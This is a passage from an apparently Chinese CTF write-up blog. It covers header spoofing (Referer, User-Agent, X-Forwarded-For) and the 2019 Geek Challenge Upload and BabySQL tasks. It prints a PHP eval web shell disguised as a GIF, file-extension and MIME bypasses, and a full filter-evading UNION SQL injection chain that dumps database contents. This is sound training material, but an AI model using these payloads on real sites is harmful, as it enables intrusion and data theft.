<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Referer:https://www.Sycsecret.com</span><br></pre></td></tr></table></figure>

<p>又说不是某个浏览器，改User-Agent</p>
<p>说只能来自本地：X-Forwarded-For:127.0.0.1</p>
<p>之后得到flag（Referer、User-Agent、X-Forwarded-For都由客户端控制，服务端不应把它们当作访问控制的依据）</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">Referer：来自哪个网站</span><br><span class="line">User-agent：浏览器</span><br><span class="line">x-forwarded-for：伪造IP</span><br></pre></td></tr></table></figure>

<h2 id="0xE-极客大挑战-2019-Upload"><a href="#0xE-极客大挑战-2019-Upload" class="headerlink" title="0xE.[极客大挑战 2019]Upload"></a>0xE.[极客大挑战 2019]Upload</h2><p>文件上传，</p>
<p>常用一句话：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">GIF89a? &lt;script language=&quot;php&quot;&gt;eval($_REQUEST[shell])&lt;/script&gt;</span><br></pre></td></tr></table></figure>

<p>绕过后缀：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">php,php3,php4,php5,phtml,pht</span><br></pre></td></tr></table></figure>

<p>更改文件类型：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">image/jpeg</span><br></pre></td></tr></table></figure>

<p>得到flag</p>
<h2 id="0xF-极客大挑战-2019-BabySQL"><a href="#0xF-极客大挑战-2019-BabySQL" class="headerlink" title="0xF.[极客大挑战 2019]BabySQL"></a>0xF.[极客大挑战 2019]BabySQL</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">对or by 有过滤</span><br><span class="line">用union select试下</span><br><span class="line">check.php?username=admin&amp;password=111 %27 uniounionn selecselectt 1,2,3%23</span><br><span class="line"></span><br><span class="line">check.php?username=admin&amp;password=111 %27 uniounionn selecselectt 1,group_concat(schema_name),3 frofromm infoorrmation_schema.schemata %23</span><br><span class="line">可疑数据库：ctf</span><br><span class="line"></span><br><span class="line">check.php?username=admin&amp;password=111 %27 uniounionn selecselectt 1,group_concat(table_name),3 frofromm infoorrmation_schema.tables whewherere table_schema=&#x27;ctf&#x27; %23</span><br><span class="line">有Flag表</span><br><span class="line"></span><br><span class="line">check.php?username=admin&amp;password=111 %27 uniounionn selecselectt 1,group_concat(column_name),3 frofromm infoorrmation_schema.columns whewherere table_schema=&#x27;ctf&#x27; aandnd column_name=&#x27;Flag&#x27;%23</span><br><span class="line">有flag</span><br><span class="line"></span><br><span class="line">check.php?username=admin&amp;password=111 %27 uniounionn selecselectt 1,flag,3 frofromm ctf.Flag%23</span><br><span class="line">得到flag</span><br></pre></td></tr></table></figure>


                                                                    </div>
                                                                    
                                                                        
                                                                </div>
                                                                




                                                                    
                                                                        
                                                            </div>
                                                            
        

      </div>

    </div>
  </body>
</html>
